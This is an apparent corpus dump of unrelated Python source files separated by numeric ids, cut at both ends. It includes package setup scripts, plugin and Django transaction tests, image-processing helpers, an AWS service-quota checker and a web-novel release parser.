return tf.matmul(x, matrix) + bias
|
67815
|
from setuptools import setup, find_packages
setup(
name="commandment",
version="0.1",
description="Commandment is an Open Source Apple MDM server with support for managing iOS and macOS devices",
packages=['commandment'],
include_package_data=True,
author="mosen",
license="MIT",
url="https://github.com/cmdmnt/commandment",
classifiers=[
'Development Status :: 3 - Alpha',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3.6'
],
keywords='MDM',
install_requires=[
'acme==0.34.2',
'alembic==1.0.10',
'apns2-client==0.5.4',
'asn1crypto==0.24.0',
'authlib==0.11',
'biplist==1.0.3',
'blinker>=1.4',
'cryptography==2.6.1',
'flask==1.0.3',
'flask-alembic==2.0.1',
'flask-cors==3.0.4',
'flask-jwt==0.3.2',
'flask-marshmallow==0.10.1',
'flask-rest-jsonapi==0.29.0',
'flask-sqlalchemy==2.4.0',
'marshmallow==2.18.0',
'marshmallow-enum==1.4.1',
'marshmallow-jsonapi==0.21.0',
'marshmallow-sqlalchemy==0.16.3',
'oscrypto==0.19.1',
'passlib==1.7.1',
'requests==2.22.0',
'semver',
'sqlalchemy==1.3.3',
'typing==3.6.4'
],
python_requires='>=3.6',
tests_require=[
'factory-boy==2.10.0',
'faker==0.8.10',
'mock==2.0.0',
'mypy==0.560'
'pytest==3.4.0',
'pytest-runner==3.0'
],
extras_requires={
'ReST': [
'sphinx-rtd-theme',
'guzzle-sphinx-theme',
'sadisplay==0.4.8',
'sphinx==1.7.0b2',
'sphinxcontrib-httpdomain==1.6.0',
'sphinxcontrib-napoleon==0.6.1',
'sphinxcontrib-plantuml==0.10',
],
'macOS': [
'pyobjc'
]
},
setup_requires=['pytest-runner'],
entry_points={
'console_scripts': [
'commandment=commandment.cli:server',
'appmanifest=commandment.pkg.appmanifest:main',
]
},
zip_safe=False
)
|
67874
|
from streamlink.plugins.oneplusone import OnePlusOne
from tests.plugins import PluginCanHandleUrl
class TestPluginCanHandleUrlOnePlusOne(PluginCanHandleUrl):
__plugin__ = OnePlusOne
should_match = [
"https://1plus1.video/ru/tvguide/plusplus/online",
"https://1plus1.video/tvguide/1plus1/online",
"https://1plus1.video/tvguide/2plus2/online",
"https://1plus1.video/tvguide/bigudi/online",
"https://1plus1.video/tvguide/plusplus/online",
"https://1plus1.video/tvguide/sport/online",
"https://1plus1.video/tvguide/tet/online",
"https://1plus1.video/tvguide/uniantv/online",
]
should_not_match = [
"https://1plus1.video/",
]
|
67884
|
def hey(phrase):
phrase = phrase.strip()
if not phrase:
return "Fine. Be that way!"
elif phrase.isupper():
return "Whoa, chill out!"
elif phrase.endswith("?"):
return "Sure."
else:
return 'Whatever.'
|
67892
|
from poop.hfdp.command.undo.command import Command
from poop.hfdp.command.undo.nocommand import NoCommand
class RemoteControlWithUndo:
def __init__(self) -> None:
no_command = NoCommand()
self.__on_commands: list[Command] = [no_command for _ in range(7)]
self.__off_commands: list[Command] = [no_command for _ in range(7)]
self.__undo_command: Command = no_command
def set_command(
self, slot: int, on_command: Command, off_command: Command
) -> None:
self.__on_commands[slot] = on_command
self.__off_commands[slot] = off_command
def on_button_was_pushed(self, slot: int) -> None:
self.__on_commands[slot].execute()
self.__undo_command = self.__on_commands[slot]
def off_button_was_pushed(self, slot: int) -> None:
self.__off_commands[slot].execute()
self.__undo_command = self.__off_commands[slot]
def undo_button_was_pushed(self) -> None:
self.__undo_command.undo()
def __str__(self) -> str:
title = "\n------ Remote Control ------\n"
on_commands = self.__on_commands
off_commands = self.__off_commands
commands = "\n".join(
f"[slot {index}] {on_commands[index].__class__.__qualname__} "
f"{off_commands[index].__class__.__qualname__}"
for index in range(7)
)
undo = f"Undo: {self.__undo_command.__class__.__qualname__}"
return f"{title}\n{commands}\n{undo}"
|
67945
|
import os
import pytest
import nucleus
from tests.helpers import TEST_DATASET_ITEMS, TEST_DATASET_NAME
assert "NUCLEUS_PYTEST_API_KEY" in os.environ, (
"You must set the 'NUCLEUS_PYTEST_API_KEY' environment variable to a valid "
"Nucleus API key to run the test suite"
)
API_KEY = os.environ["NUCLEUS_PYTEST_API_KEY"]
@pytest.fixture(scope="session")
def CLIENT():
client = nucleus.NucleusClient(API_KEY)
return client
@pytest.fixture()
def dataset(CLIENT):
ds = CLIENT.create_dataset(TEST_DATASET_NAME)
ds.append(TEST_DATASET_ITEMS)
yield ds
CLIENT.delete_dataset(ds.id)
if __name__ == "__main__":
client = nucleus.NucleusClient(API_KEY)
# ds = client.create_dataset("Test Dataset With Autotags")
# ds.append(TEST_DATASET_ITEMS)
ds = client.get_dataset("ds_c5jwptkgfsqg0cs503z0")
job = ds.create_image_index()
job.sleep_until_complete()
print(ds.id)
|
67963
|
from django import forms
class SampleSearchForm(forms.Form):
"""Search form for test purposes"""
query = forms.CharField(widget=forms.TextInput(attrs={'class': 'input-xlarge search-query',
'autocomplete': 'off'}))
|
67981
|
import numpy as np
from skimage.transform import resize
import skimage
import torchvision.utils as tvutils
import torch
import PIL
from PIL import Image
import torchvision
class UnNormalize(object):
def __init__(self, mean, std):
self.mean = torch.tensor(mean).unsqueeze(0).unsqueeze(2).unsqueeze(3)
self.std = torch.tensor(std).unsqueeze(0).unsqueeze(2).unsqueeze(3)
def __call__(self, tensor):
"""
Args:
tensor (Tensor): Tensor image of size (C, H, W) to be normalized.
Returns:
Tensor: Normalized image.
"""
# for t, m, s in zip(tensor, self.mean, self.std):
# t * s + m
# # The normalize code -> t.sub_(m).div_(s)
return tensor * self.std.to(tensor.device) + self.mean.to(tensor.device)
imagenet_unnormalize = UnNormalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
taskononomy_unnormalize = UnNormalize([0.5,0.5,0.5], [0.5, 0.5, 0.5])
def log_input_images(obs_unpacked, mlog, num_stack, key_names=['map'], meter_name='debug/input_images', step_num=0, reset_meter=True, phase='train', unnormalize=taskononomy_unnormalize):
# Plots the observations from the first process
stacked = []
for key_name in key_names:
if key_name not in obs_unpacked:
print(key_name, "not found")
continue
obs = obs_unpacked[key_name][0]
obs = (obs + 1.0) / 2.0
# obs = unnormalize(obs)
# obs = (obs * 2. - 1.)
try:
obs = obs.cpu()
except:
pass
obs_chunked = list(torch.chunk(obs, num_stack, dim=0))
if obs_chunked[0].shape[2] == 1 or obs_chunked[0].shape[2] == 3:
obs_chunked = [o.permute(2, 0, 1) for o in obs_chunked]
obs_chunked = [hacky_resize(obs) for obs in obs_chunked]
key_stacked = torchvision.utils.make_grid(obs_chunked, nrow=num_stack, padding=2)
stacked.append(key_stacked)
stacked = torch.cat(stacked, dim=1)
mlog.update_meter(stacked, meters={meter_name}, phase=phase)
if reset_meter:
mlog.reset_meter(step_num, meterlist={meter_name})
def hacky_resize(obs: torch.Tensor) -> torch.Tensor:
obs_img_format = np.transpose((255 * obs.cpu().numpy()).astype(np.uint8), (1,2,0))
obs_resized = torch.Tensor(np.array(Image.fromarray(obs_img_format).resize((84,84))).astype(np.float32)).permute((2,0,1))
return obs_resized / 255.
def rescale_for_display( batch, rescale=True, normalize=False ):
'''
Prepares network output for display by optionally rescaling from [-1,1],
and by setting some pixels to the min/max of 0/1. This prevents matplotlib
from rescaling the images.
'''
if rescale:
display_batch = [ rescale_image( im.copy(), new_scale=[0, 1], current_scale=[-1, 1] )
for im in batch ]
else:
display_batch = batch.copy()
if not normalize:
for im in display_batch:
im[0,0,0] = 1.0 # Adjust some values so that matplotlib doesn't rescale
im[0,1,0] = 0.0 # Now adjust the min
return display_batch
def rescale_image(im, new_scale=[-1.,1.], current_scale=None, no_clip=False):
"""
Rescales an image pixel values to target_scale
Args:
img: A np.float_32 array, assumed between [0,1]
new_scale: [min,max]
current_scale: If not supplied, it is assumed to be in:
[0, 1]: if dtype=float
[0, 2^16]: if dtype=uint
[0, 255]: if dtype=ubyte
Returns:
rescaled_image
"""
# im = im.astype(np.float32)
if current_scale is not None:
min_val, max_val = current_scale
if not no_clip:
im = np.clip(im, min_val, max_val)
im = im - min_val
im /= (max_val - min_val)
min_val, max_val = new_scale
im *= (max_val - min_val)
im += min_val
im = skimage.img_as_float(im)
return im
def resize_image(im, new_dims, interp_order=1):
"""
Resize an image array with interpolation.
Parameters
----------
im : (H x W x K) ndarray
new_dims : (height, width) tuple of new dimensions.
interp_order : interpolation order, default is linear.
Returns
-------
im : resized ndarray with shape (new_dims[0], new_dims[1], K)
By kchen @ https://github.com/kchen92/joint-representation/blob/24b30ca6963d2ec99618af379c1e05e1f7026710/lib/data/input_pipeline_feed_dict.py
"""
if type(im) == PIL.PngImagePlugin.PngImageFile:
interps = [PIL.Image.NEAREST, PIL.Image.BILINEAR]
return skimage.util.img_as_float(im.resize(new_dims, interps[interp_order]))
if all( new_dims[i] == im.shape[i] for i in range( len( new_dims ) ) ):
resized_im = im #return im.astype(np.float32)
elif im.shape[-1] == 1 or im.shape[-1] == 3:
# # skimage is fast but only understands {1,3} channel images
resized_im = resize(im, new_dims, order=interp_order, preserve_range=True)
else:
# ndimage interpolates anything but more slowly.
scale = tuple(np.array(new_dims, dtype=float) / np.array(im.shape[:2]))
resized_im = zoom(im, scale + (1,), order=interp_order)
# resized_im = resized_im.astype(np.float32)
return resized_im
def resize_rescale_image(img, new_dims, new_scale, interp_order=1, current_scale=None, no_clip=False):
"""
Resize an image array with interpolation, and rescale to be
between
Parameters
----------
im : (H x W x K) ndarray
new_dims : (height, width) tuple of new dimensions.
new_scale : (min, max) tuple of new scale.
interp_order : interpolation order, default is linear.
Returns
-------
im : resized ndarray with shape (new_dims[0], new_dims[1], K)
"""
img = skimage.img_as_float( img )
img = resize_image( img, new_dims, interp_order )
img = rescale_image( img, new_scale, current_scale=current_scale, no_clip=no_clip )
return img
def pack_images(x, prediction, label, mask=None):
uncertainty = None
if isinstance(prediction, tuple):
prediction, uncertainty = prediction
if len(label.shape) == 4 and label.shape[1] == 2:
zeros = torch.zeros(label.shape[0], 1, label.shape[2], label.shape[3]).to(label.device)
label = torch.cat([label, zeros], dim=1)
prediction = torch.cat([prediction, zeros], dim=1)
if uncertainty is not None:
uncertainty = torch.cat([uncertainty, zeros], dim=1)
if mask is not None:
mask = torch.cat([mask, mask[:,0].unsqueeze(1)], dim=1)
if len(x.shape) == 4 and x.shape[1] == 2:
zeros = torch.zeros(x.shape[0], 1, x.shape[2], x.shape[3]).to(x.device)
x = torch.cat([x, zeros], dim=1)
to_cat = []
if x.shape[1] <= 3:
to_cat.append(x)
shape_with_three_channels = list(x.shape)
shape_with_three_channels[1] = 3
to_cat.append(prediction.expand(shape_with_three_channels))
if uncertainty is not None:
print(uncertainty.min(), uncertainty.max())
uncertainty = 2*uncertainty - 1.0
uncertainty = uncertainty.clamp(min=-1.0, max=1.0)
to_cat.append(uncertainty.expand(shape_with_three_channels))
to_cat.append(label.expand(shape_with_three_channels))
if mask is not None:
to_cat.append(mask.expand(shape_with_three_channels))
# print([p.shape for p in to_cat])
im_samples = torch.cat(to_cat, dim=3)
im_samples = tvutils.make_grid(im_samples.detach().cpu(), nrow=1, padding=2)
return im_samples
def maybe_entriple(x, is_mask=False):
if x.shape[1] == 2:
if is_mask:
x = torch.cat([x, x[:,0].unsqueeze(1)], dim=1)
else:
zeros = torch.zeros(x.shape[0], 1, x.shape[2], x.shape[3]).to(x.device)
x = torch.cat([x, zeros], dim=1)
shape_with_three_channels = list(x.shape)
shape_with_three_channels[1] = 3
return x.expand(shape_with_three_channels)
def pack_chained_images(x, predictions, labels, mask=None):
x = maybe_entriple(x)
if mask is not None:
mask = maybe_entriple(mask, is_mask=True)
tripled_predictions, uncertainties = [], []
for p in predictions:
if isinstance(p, tuple):
p, u = p
uncertainties.append(maybe_entriple(u))
else:
uncertainties.append(None)
tripled_predictions.append(maybe_entriple(p))
predictions = tripled_predictions
labels = [maybe_entriple(l) for l in labels]
to_cat = []
if x.shape[1] <= 3:
to_cat.append(x)
for pred, uncert, label in zip(predictions, uncertainties, labels):
to_cat.append(label)
to_cat.append(pred)
if uncert is not None:
print(uncert.min(), uncert.max())
uncert = 2*uncert - 1.0
uncert = uncert.clamp(min=-1.0, max=1.0)
to_cat.append(uncert)
if mask is not None:
to_cat.append(mask)
# print([p.shape for p in to_cat])
im_samples = torch.cat(to_cat, dim=3)
im_samples = tvutils.make_grid(im_samples.detach().cpu(), nrow=1, padding=2)
return im_samples
|
68031
|
import sqlmlutils
connection=sqlmlutils.ConnectionInfo(server="localhost",database="Test")
sqlmlutils.SQLPackageManager(connection).install("textblob")
|
68037
|
from setuptools import setup, find_packages
"""
Instructions for creating a release of the scispacy library.
1. Make sure your working directory is clean.
2. Make sure that you have changed the versions in "scispacy/version.py".
3. Create the distribution by running "python setup.py sdist" in the root of the repository.
4. Check you can install the new distribution in a clean environment.
5. Upload the distribution to pypi by running "twine upload <path to the distribution> -u <username> -p <password>".
This step will ask you for a username and password - the username is "scispacy" you can
get the password from LastPass.
"""
VERSION = {}
# version.py defines VERSION and VERSION_SHORT variables.
# We use exec here to read it so that we don't import scispacy
# whilst setting up the package.
with open("scispacy/version.py", "r") as version_file:
exec(version_file.read(), VERSION)
setup(
name="scispacy",
version=VERSION["VERSION"],
url="https://allenai.github.io/SciSpaCy/",
author="Allen Institute for Artificial Intelligence",
author_email="<EMAIL>",
description="A full SpaCy pipeline and models for scientific/biomedical documents.",
long_description=open("README.md").read(),
long_description_content_type="text/markdown",
keywords=["bioinformatics nlp spacy SpaCy biomedical"],
classifiers=[
"Intended Audience :: Science/Research",
"Development Status :: 3 - Alpha",
"License :: OSI Approved :: Apache Software License",
"Programming Language :: Python :: 3.6",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
"Topic :: Scientific/Engineering :: Bio-Informatics",
],
packages=find_packages(exclude=["*.tests", "*.tests.*", "tests.*", "tests"]),
license="Apache",
install_requires=[
"spacy>=3.0.0,<3.1.0",
"requests>=2.0.0,<3.0.0",
"conllu",
"numpy",
"joblib",
"nmslib>=1.7.3.6",
"scikit-learn>=0.20.3",
"pysbd",
],
tests_require=["pytest", "pytest-cov", "flake8", "black", "mypy"],
python_requires=">=3.6.0",
)
|
68073
|
from concurrent.futures.thread import ThreadPoolExecutor
from typing import List
from provider.aws.common_aws import get_paginator
from provider.aws.limit.command import LimitOptions
from provider.aws.limit.data.allowed_resources import (
ALLOWED_SERVICES_CODES,
FILTER_EC2_BIGFAMILY,
SPECIAL_RESOURCES,
)
from shared.common import (
ResourceProvider,
Resource,
ResourceDigest,
message_handler,
ResourceCache,
LimitsValues,
)
from shared.error_handler import exception
SERVICEQUOTA_TO_BOTO3 = {
"elasticloadbalancing": "elbv2",
"elasticfilesystem": "efs",
"vpc": "ec2",
"codeguru-profiler": "codeguruprofiler",
"AWSCloudMap": "servicediscovery",
"ebs": "ec2",
}
MAX_EXECUTION_PARALLEL = 2
class LimitResources(ResourceProvider):
def __init__(self, options: LimitOptions):
"""
All resources
:param options:
"""
super().__init__()
self.options = options
self.cache = ResourceCache()
@exception
# pylint: disable=too-many-locals
def get_resources(self) -> List[Resource]:
threshold_requested = (
0 if self.options.threshold is None else self.options.threshold
)
client_quota = self.options.client("service-quotas")
resources_found = []
services = self.options.services
with ThreadPoolExecutor(MAX_EXECUTION_PARALLEL) as executor:
results = executor.map(
lambda service_name: self.analyze_service(
service_name=service_name,
client_quota=client_quota,
threshold_requested=int(threshold_requested),
),
services,
)
for result in results:
if result is not None:
resources_found.extend(result)
return resources_found
@exception
def analyze_service(self, service_name, client_quota, threshold_requested):
if service_name in SPECIAL_RESOURCES:
return []
cache_key = "aws_limits_" + service_name + "_" + self.options.region_name
cache = self.cache.get_key(cache_key)
resources_found = []
if service_name not in cache:
return []
"""
Services that must be enabled in your account. Those services will fail you don't enable
Fraud Detector: https://pages.awscloud.com/amazon-fraud-detector-preview.html#
AWS Organizations: https://console.aws.amazon.com/organizations/
"""
if service_name in ("frauddetector", "organizations"):
message_handler(
"Attention: Service "
+ service_name
+ " must be enabled to use API calls.",
"WARNING",
)
for data_quota_code in cache[service_name]:
if data_quota_code is None:
continue
resource_found = self.analyze_quota(
client_quota=client_quota,
data_quota_code=data_quota_code,
service=service_name,
threshold_requested=threshold_requested,
)
if resource_found is not None:
resources_found.append(resource_found)
return resources_found
@exception
# pylint: disable=too-many-locals,too-many-statements
def analyze_quota(
self, client_quota, data_quota_code, service, threshold_requested
):
resource_found = None
quota_data = ALLOWED_SERVICES_CODES[service][data_quota_code["quota_code"]]
value_aws = value = data_quota_code["value"]
# Quota is adjustable by ticket request, then must override this values.
if bool(data_quota_code["adjustable"]) is True:
try:
response_quota = client_quota.get_service_quota(
ServiceCode=service, QuotaCode=data_quota_code["quota_code"]
)
if "Value" in response_quota["Quota"]:
value = response_quota["Quota"]["Value"]
else:
value = data_quota_code["value"]
except client_quota.exceptions.NoSuchResourceException:
value = data_quota_code["value"]
if self.options.verbose:
message_handler(
"Collecting data from Quota: "
+ service
+ " - "
+ data_quota_code["quota_name"]
+ "...",
"HEADER",
)
# Need to convert some quota-services endpoint
if service in SERVICEQUOTA_TO_BOTO3:
service = SERVICEQUOTA_TO_BOTO3.get(service)
"""
AWS Networkservice is a global service and just allows region us-west-2 instead us-east-1
Reference https://docs.aws.amazon.com/networkmanager/latest/APIReference/Welcome.html
TODO: If we detect more resources like that, convert it into a dict
"""
if service == "networkmanager":
region_boto3 = "us-west-2"
else:
region_boto3 = self.options.region_name
client = self.options.session.client(service, region_name=region_boto3)
usage = 0
# Check filters by resource
if "filter" in quota_data:
filters = quota_data["filter"]
else:
filters = None
pages = get_paginator(
client=client,
operation_name=quota_data["method"],
resource_type="aws_limit",
filters=filters,
)
if not pages:
if filters:
response = getattr(client, quota_data["method"])(**filters)
else:
response = getattr(client, quota_data["method"])()
# If fields element is not empty, sum values instead list len
if quota_data["fields"]:
for item in response[quota_data["method"]]:
usage = usage + item[quota_data["fields"]]
else:
usage = len(response[quota_data["key"]])
else:
for page in pages:
if quota_data["fields"]:
if len(page[quota_data["key"]]) > 0:
usage = usage + page[quota_data["key"]][0][quota_data["fields"]]
else:
usage = usage + len(page[quota_data["key"]])
# Value for division
if "divisor" in quota_data:
usage = usage / quota_data["divisor"]
"""
Hack to workaround boto3 limits of 200 items per filter.
Quota L-1216C47A needs more than 200 items. Not happy with this code
TODO: Refactor this piece of terrible code.
"""
if data_quota_code["quota_code"] == "L-1216C47A":
filters = FILTER_EC2_BIGFAMILY["filter"]
pages = get_paginator(
client=client,
operation_name=quota_data["method"],
resource_type="aws_limit",
filters=filters,
)
if not pages:
response = getattr(client, quota_data["method"])(**filters)
usage = len(response[quota_data["key"]])
else:
for page in pages:
usage = usage + len(page[quota_data["key"]])
try:
percent = round((usage / value) * 100, 2)
except ZeroDivisionError:
percent = 0
if percent >= threshold_requested:
resource_found = Resource(
digest=ResourceDigest(
id=data_quota_code["quota_code"], type="aws_limit"
),
name="",
group="",
limits=LimitsValues(
quota_name=data_quota_code["quota_name"],
quota_code=data_quota_code["quota_code"],
aws_limit=int(value_aws),
local_limit=int(value),
usage=int(usage),
service=service,
percent=percent,
),
)
return resource_found
|
68118
|
from setuptools import setup, find_packages
import sys
import os
VERSION = '1.6'
# Cython has to be installed before. And I could not find any other ways.
os.system('pip install cython')
from Cython.Build import cythonize
if sys.version_info[0] < 3:
raise Exception('Must be using Python 3.')
setup(name='lead-lag',
version=VERSION,
ext_modules=cythonize("lead_lag/lead_lag_impl.pyx", language_level="3"),
description='Lead lag estimation with a O(n log n) complexity.',
author='<NAME>',
license='Open Source',
packages=find_packages(),
include_package_data=True,
install_requires=[
'pandas>=0.22.0',
'numpy>=1.15.0',
'tqdm>=4.19.2',
'matplotlib>=2.2.2',
])
|
68148
|
import os
print(os.getcwd())
l = os.listdir()
print(l)
assert "test_dirs.py" in l
assert "os" in l
for t in os.walk("."):
print(t)
for t in os.walk(".", False):
print(t)
|
68173
|
def extractNovelsJapan(item):
"""
'Novels Japan'
"""
if item['title'].endswith(' (Sponsored)'):
item['title'] = item['title'][:-1 * len(' (Sponsored)')]
if item['title'].endswith(' and Announcement'):
item['title'] = item['title'][:-1 * len(' and Announcement')]
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or 'preview' in item['title'].lower():
return None
if item['title'].lower().endswith('loner dungeon'):
return buildReleaseMessageWithType(item, 'I who is a Loner, Using cheats adapts to the Dungeon', vol, chp, frag=frag, postfix=postfix)
if item['title'].lower().endswith('vending machine'):
return buildReleaseMessageWithType(item, 'I was Reborn as a Vending Machine, Wandering in the Dungeon', vol, chp, frag=frag, postfix=postfix)
if item['title'].lower().endswith('login bonus'):
return buildReleaseMessageWithType(item, 'Skill Up with Login Bonus', vol, chp, frag=frag, postfix=postfix)
if item['title'].lower().endswith('lv2 cheat') or item['title'].lower().endswith(
'ex-hero candidate’s, who turned out to be a cheat from lv2, laid-back life in another world') or 'Lv2 Cheat' in item['tags']:
return buildReleaseMessageWithType(item, "Ex-Hero Candidate's, Who Turned Out To Be A Cheat From Lv2, Laid-back Life In Another World", vol, chp, frag=frag, postfix=postfix)
if 'Second Earth' in item['tags']:
return buildReleaseMessageWithType(item, 'Second Earth', vol, chp, frag=frag, postfix=postfix)
if 'Strongest Revolution' in item['tags']:
return buildReleaseMessageWithType(item, 'The Fierce Revolution ~ The Strongest Organism Which Can Kill the Devil and the Hero', vol, chp, frag=frag, postfix=postfix)
if 'Loner Dungeon' in item['tags']:
return buildReleaseMessageWithType(item, 'I who is a Loner, Using cheats adapts to the Dungeon', vol, chp, frag=frag, postfix=postfix)
if 'Skill Up' in item['tags']:
return buildReleaseMessageWithType(item, 'Skill Up with Login Bonus', vol, chp, frag=frag, postfix=postfix)
if 'Isobe Isobee' in item['tags']:
return buildReleaseMessageWithType(item, 'Isobe Isobee', vol, chp, frag=frag, postfix=postfix)
if 'Ex-hero' in item['tags']:
return buildReleaseMessageWithType(item, "Ex-Hero Candidate's, Who Turned Out To Be A Cheat From Lv2, Laid-back Life In Another World", vol, chp, frag=frag, postfix=postfix)
return False
|
68206
|
from __future__ import absolute_import
import sys
try:
import threading
except ImportError:
threading = None
import time
from django.db import (connection, transaction,
DatabaseError, Error, IntegrityError, OperationalError)
from django.test import TransactionTestCase, skipIfDBFeature, skipUnlessDBFeature
from django.test.utils import IgnorePendingDeprecationWarningsMixin
from django.utils import six
from django.utils.unittest import skipIf, skipUnless
from .models import Reporter
@skipUnless(connection.features.uses_savepoints,
"'atomic' requires transactions and savepoints.")
class AtomicTests(TransactionTestCase):
"""
Tests for the atomic decorator and context manager.
The tests make assertions on internal attributes because there isn't a
robust way to ask the database for its current transaction state.
Since the decorator syntax is converted into a context manager (see the
implementation), there are only a few basic tests with the decorator
syntax and the bulk of the tests use the context manager syntax.
"""
available_apps = ['transactions']
def test_decorator_syntax_commit(self):
@transaction.atomic
def make_reporter():
Reporter.objects.create(first_name="Tintin")
make_reporter()
self.assertQuerysetEqual(Reporter.objects.all(), ['<Reporter: Tintin>'])
def test_decorator_syntax_rollback(self):
@transaction.atomic
def make_reporter():
Reporter.objects.create(first_name="Haddock")
raise Exception("Oops, that's his last name")
with six.assertRaisesRegex(self, Exception, "Oops"):
make_reporter()
self.assertQuerysetEqual(Reporter.objects.all(), [])
def test_alternate_decorator_syntax_commit(self):
@transaction.atomic()
def make_reporter():
Reporter.objects.create(first_name="Tintin")
make_reporter()
self.assertQuerysetEqual(Reporter.objects.all(), ['<Reporter: Tintin>'])
def test_alternate_decorator_syntax_rollback(self):
@transaction.atomic()
def make_reporter():
Reporter.objects.create(first_name="Haddock")
raise Exception("Oops, that's his last name")
with six.assertRaisesRegex(self, Exception, "Oops"):
make_reporter()
self.assertQuerysetEqual(Reporter.objects.all(), [])
def test_commit(self):
with transaction.atomic():
Reporter.objects.create(first_name="Tintin")
self.assertQuerysetEqual(Reporter.objects.all(), ['<Reporter: Tintin>'])
def test_rollback(self):
with six.assertRaisesRegex(self, Exception, "Oops"):
with transaction.atomic():
Reporter.objects.create(first_name="Haddock")
raise Exception("Oops, that's his last name")
self.assertQuerysetEqual(Reporter.objects.all(), [])
def test_nested_commit_commit(self):
with transaction.atomic():
Reporter.objects.create(first_name="Tintin")
with transaction.atomic():
Reporter.objects.create(first_name="Archibald", last_name="Haddock")
self.assertQuerysetEqual(Reporter.objects.all(),
['<Reporter: <NAME>>', '<Reporter: Tintin>'])
def test_nested_commit_rollback(self):
with transaction.atomic():
Reporter.objects.create(first_name="Tintin")
with six.assertRaisesRegex(self, Exception, "Oops"):
with transaction.atomic():
Reporter.objects.create(first_name="Haddock")
raise Exception("Oops, that's his last name")
self.assertQuerysetEqual(Reporter.objects.all(), ['<Reporter: Tintin>'])
def test_nested_rollback_commit(self):
with six.assertRaisesRegex(self, Exception, "Oops"):
with transaction.atomic():
Reporter.objects.create(last_name="Tintin")
with transaction.atomic():
Reporter.objects.create(last_name="Haddock")
raise Exception("Oops, that's his first name")
self.assertQuerysetEqual(Reporter.objects.all(), [])
def test_nested_rollback_rollback(self):
with six.assertRaisesRegex(self, Exception, "Oops"):
with transaction.atomic():
Reporter.objects.create(last_name="Tintin")
with six.assertRaisesRegex(self, Exception, "Oops"):
with transaction.atomic():
Reporter.objects.create(first_name="Haddock")
raise Exception("Oops, that's his last name")
raise Exception("Oops, that's his first name")
self.assertQuerysetEqual(Reporter.objects.all(), [])
def test_merged_commit_commit(self):
with transaction.atomic():
Reporter.objects.create(first_name="Tintin")
with transaction.atomic(savepoint=False):
Reporter.objects.create(first_name="Archibald", last_name="Haddock")
self.assertQuerysetEqual(Reporter.objects.all(),
['<Reporter: <NAME>>', '<Reporter: Tintin>'])
def test_merged_commit_rollback(self):
with transaction.atomic():
Reporter.objects.create(first_name="Tintin")
with six.assertRaisesRegex(self, Exception, "Oops"):
with transaction.atomic(savepoint=False):
Reporter.objects.create(first_name="Haddock")
raise Exception("Oops, that's his last name")
# Writes in the outer block are rolled back too.
self.assertQuerysetEqual(Reporter.objects.all(), [])
def test_merged_rollback_commit(self):
with six.assertRaisesRegex(self, Exception, "Oops"):
with transaction.atomic():
Reporter.objects.create(last_name="Tintin")
with transaction.atomic(savepoint=False):
Reporter.objects.create(last_name="Haddock")
raise Exception("Oops, that's his first name")
self.assertQuerysetEqual(Reporter.objects.all(), [])
def test_merged_rollback_rollback(self):
with six.assertRaisesRegex(self, Exception, "Oops"):
with transaction.atomic():
Reporter.objects.create(last_name="Tintin")
with six.assertRaisesRegex(self, Exception, "Oops"):
with transaction.atomic(savepoint=False):
Reporter.objects.create(first_name="Haddock")
raise Exception("Oops, that's his last name")
raise Exception("Oops, that's his first name")
self.assertQuerysetEqual(Reporter.objects.all(), [])
def test_reuse_commit_commit(self):
atomic = transaction.atomic()
with atomic:
Reporter.objects.create(first_name="Tintin")
with atomic:
Reporter.objects.create(first_name="Archibald", last_name="Haddock")
self.assertQuerysetEqual(Reporter.objects.all(),
['<Reporter: <NAME>>', '<Reporter: Tintin>'])
def test_reuse_commit_rollback(self):
atomic = transaction.atomic()
with atomic:
Reporter.objects.create(first_name="Tintin")
with six.assertRaisesRegex(self, Exception, "Oops"):
with atomic:
Reporter.objects.create(first_name="Haddock")
raise Exception("Oops, that's his last name")
self.assertQuerysetEqual(Reporter.objects.all(), ['<Reporter: Tintin>'])
def test_reuse_rollback_commit(self):
atomic = transaction.atomic()
with six.assertRaisesRegex(self, Exception, "Oops"):
with atomic:
Reporter.objects.create(last_name="Tintin")
with atomic:
Reporter.objects.create(last_name="Haddock")
raise Exception("Oops, that's his first name")
self.assertQuerysetEqual(Reporter.objects.all(), [])
def test_reuse_rollback_rollback(self):
atomic = transaction.atomic()
with six.assertRaisesRegex(self, Exception, "Oops"):
with atomic:
Reporter.objects.create(last_name="Tintin")
with six.assertRaisesRegex(self, Exception, "Oops"):
with atomic:
Reporter.objects.create(first_name="Haddock")
raise Exception("Oops, that's his last name")
raise Exception("Oops, that's his first name")
self.assertQuerysetEqual(Reporter.objects.all(), [])
def test_force_rollback(self):
with transaction.atomic():
Reporter.objects.create(first_name="Tintin")
# atomic block shouldn't rollback, but force it.
self.assertFalse(transaction.get_rollback())
transaction.set_rollback(True)
self.assertQuerysetEqual(Reporter.objects.all(), [])
def test_prevent_rollback(self):
with transaction.atomic():
Reporter.objects.create(first_name="Tintin")
sid = transaction.savepoint()
# trigger a database error inside an inner atomic without savepoint
with self.assertRaises(DatabaseError):
with transaction.atomic(savepoint=False):
connection.cursor().execute(
"SELECT no_such_col FROM transactions_reporter")
# prevent atomic from rolling back since we're recovering manually
self.assertTrue(transaction.get_rollback())
transaction.set_rollback(False)
transaction.savepoint_rollback(sid)
self.assertQuerysetEqual(Reporter.objects.all(), ['<Reporter: Tintin>'])
class AtomicInsideTransactionTests(AtomicTests):
"""All basic tests for atomic should also pass within an existing transaction."""
def setUp(self):
self.atomic = transaction.atomic()
self.atomic.__enter__()
def tearDown(self):
self.atomic.__exit__(*sys.exc_info())
@skipIf(connection.features.autocommits_when_autocommit_is_off,
"This test requires a non-autocommit mode that doesn't autocommit.")
class AtomicWithoutAutocommitTests(AtomicTests):
"""All basic tests for atomic should also pass when autocommit is turned off."""
def setUp(self):
transaction.set_autocommit(False)
def tearDown(self):
# The tests access the database after exercising 'atomic', initiating
# a transaction ; a rollback is required before restoring autocommit.
transaction.rollback()
transaction.set_autocommit(True)
@skipIf(connection.features.autocommits_when_autocommit_is_off,
"This test requires a non-autocommit mode that doesn't autocommit.")
class AtomicInsideLegacyTransactionManagementTests(AtomicTests):
def setUp(self):
transaction.enter_transaction_management()
def tearDown(self):
# The tests access the database after exercising 'atomic', making the
# connection dirty; a rollback is required to make it clean.
transaction.rollback()
transaction.leave_transaction_management()
@skipUnless(connection.features.uses_savepoints,
"'atomic' requires transactions and savepoints.")
